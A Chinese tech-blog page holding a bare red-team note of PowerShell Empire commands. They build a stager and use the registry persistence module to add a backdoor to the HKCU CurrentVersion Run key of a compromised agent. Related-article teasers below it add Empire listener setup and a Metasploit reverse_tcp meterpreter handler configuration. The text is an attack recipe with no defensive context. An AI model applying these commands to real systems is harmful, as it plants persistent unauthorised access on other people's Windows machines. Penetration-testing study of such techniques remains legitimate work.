Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >powershell/persistence/userland/registry

powershell/persistence/userland/registry

原创
作者头像
浪子云
发布于 2022-05-23 11:04:33
发布于 2022-05-23 11:04:33
29000
代码可运行
举报
文章被收录于专栏:子云笔记子云笔记
运行总次数:0
代码可运行
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
usestager windows/cmd_exec

usemodule powershell/persistence/userland/registry

set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run

set Agent NRZAPF56


interact NRZAPF56

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
持续控制技术和策略(A View of Persistence)
其中第5个步骤“Installation”意思为“重新获得对系统的命令和控制(如果丢失),而不必重复步骤1到4”。当遇到一些操作不行的时候就要考虑权限问题,uac策略等!
Ms08067安全实验室
2019/09/24
5260
持续控制技术和策略(A View of Persistence)
empire-registry
empire-registrypowershell-empire serverpowershell-empire clientuselistener httpset Name testset Port 8899executebacklistenersusestager windows/cmd_execset Listener testset OutFile shell33.batexecuteusemodule powershell/persistence/userland/registryset RegP
浪子云
2022/06/24
3290
三大渗透框架权限维持
在渗透测试中,有三个非常经典的渗透测试框架--Metasploit、Empire、Cobalt Strike。
Bypass
2019/10/03
1.2K0
FreeBuf__PowerShell Empire实战入门篇
前言 PowerShsell Empire中文简称 “帝国” ,可能大多数只听说过这款内网渗透神器,针对windows系统平台而打造的一款渗透工具。在PowerShell方面,帝国实现了无需powershell.exe即可运行PowerShell代理的功能,可快速部署的开发后的模块从按键记录到Mimikatz,可逃避网络检测的能力,适应性强的通信,都包裹在易用性为重点的框架,有点类似于像meterpreter。 Empire详情介绍参考官方网站:http://powershellempire.
奶糖味的代言
2018/04/16
2K0
FreeBuf__PowerShell Empire实战入门篇
Window权限维持(一):注册表运行键
在红队行动中在网络中获得最初的立足点是一项耗时的任务。因此,持久性是红队成功运作的关键,这将使团队能够专注于目标,而不会失去与指挥和控制服务器的通信。
Bypass
2019/11/07
1.2K0
Window权限维持(一):注册表运行键
内网渗透基石篇——权限维持分析
专注是做事成功的关键,是健康心灵的特质。当你与所关注的事物融为一体时,就不会让自己萦绕于焦虑之中。专注与放松,是同一枚硬币的两面而已。一个人对一件事只有专注投入才会带来乐趣。一旦你专注投入进去,它立刻就变得活生生起来。
FB客服
2021/08/24
1.6K0
CobaltStrike-01
1. 1.jpg 2. 2.jpg 3.jpg 4.jpg 5.jpg 6.jpg 7.jpg 8.jpg 9.jpg kali:启动 msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.195 set lport 9999 10.jpg 11.jpg
浪子云
2022/02/24
4340
Windows中常见后门持久化方法总结
当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法
HACK学习
2019/10/09
2.9K0
Windows中常见后门持久化方法总结
一篇文章精通PowerShell Empire 2.3(下)
Empire主要用于后渗透。所以信息收集是比较常用的一个模块,我们可以使用searchmodule命令搜索需要使用的模块,这里通过键入“usemodule collection”然后按Tab键来查看完整列表,如下图所示。
HACK学习
2019/08/07
1K0
红队常用命令
如下编码网站: https://ares-x.com/tools/runtime-exec/ https://r0yanx.com/tools/java_exec_encode/ https://www.bugku.net/runtime-exec-payloads/
reyeye
2023/10/13
3.5K0
获取主机已安装程序的多种方式
这篇文章我们主要讲的是获取主机已安装程序的多种方式,通过获取的软件及版本信息可用于权限提升、搜集密码等。因为有的方式获取不完整或者可能被安全防护软件拦截,所有我测试了多个方法,以备不时之需。
潇湘信安
2022/09/14
1.7K0
获取主机已安装程序的多种方式
Win11彻底关闭Defender(包括禁用、删除Defender服务和文件夹)
一般是不建议禁止defender自动更新或者彻底关闭Defender的,但如果你有其他替代的安全方案了,觉得defender有干扰业务隐患,想干掉,那这篇文档非常适用。耗费了不少心血在server2016-2022和win10、win11上对比实践。
Windows技术交流
2023/05/26
21.4K0
PowerShell渗透–Empire
Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpreter,是一个基于PowerShell的远控木马(www.powershellempire.com)
糖果
2019/11/20
2.3K0
利用注册表键值Bypass UAC
fodhelper.exe是一个具备autoElevate属性且是微软自带的工具,具备微软签名,该程序在执行过程中会将注册表中HKCU:\Software\Classes\ms-settings\Shell\Open\command的内容当作命令执行。接下来笔者通过该程序大致地讲解一下如何通过fodhelper.exe绕过UAC。
一只特立独行的兔先生
2024/02/14
7510
利用注册表键值Bypass UAC
windows权限维持(二)
在一般用户权限下,通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run,键名任意。普通权限即可运行
鸿鹄实验室
2021/04/15
1.7K0
windows权限维持(二)
Win10 解除程序网络保护和取消“代理服务器
在左下的“开始”目录,找到“命令提示符”,在“命令提示符”上按右键,选以管理员的身份打开
寒龙亦
2021/10/27
1.4K0
Win10 解除程序网络保护和取消“代理服务器
Window下常见的权限维持方式
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。
Bypass
2019/12/12
1.3K0
Window下常见的权限维持方式
反弹shell的学习总结 - Part 2
dnscat2(https://github.com/iagox86/dnscat2)是一个DNS隧道,旨在通过DNS协议创建加密的命令和控制(C&C)通道。dnscat2分为两部分:客户端和服务端。dnscat2客户端采用C语言编写,服务器端采用ruby语言编写。后来又有安全研究人员使用PowerShell脚本重写了dnscat2客户端dnscat2-powershell(https://github.com/lukebaggett/dnscat2-powershell)。
安全小王子
2020/07/31
2K0
反弹shell的学习总结 - Part 2
浅谈命令混淆
此前一个朋友问到,客服的hids设备执行whoami,被检测到,无论是执行wh"o"aM^i,还是执行cmd /c ",;((w^h^o^a^M^i))"都会被检测到,于是向我求助,既然提到了这里,阿鑫就在这里简单总结一下我自己的一些方法吧,但是会的方法有比较少,后面在补充几个cmd/powershell平时常用的命令
红队蓝军
2022/05/17
6690
浅谈命令混淆
PS常用命令之文件目录及内容操作
描述: 切换当前工作目录的路径实际上在PowerShell中cd命令就是其的别名。
全栈工程师修炼指南
2022/09/29
8.4K0
PS常用命令之文件目录及内容操作
相关推荐
持续控制技术和策略(A View of Persistence)
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验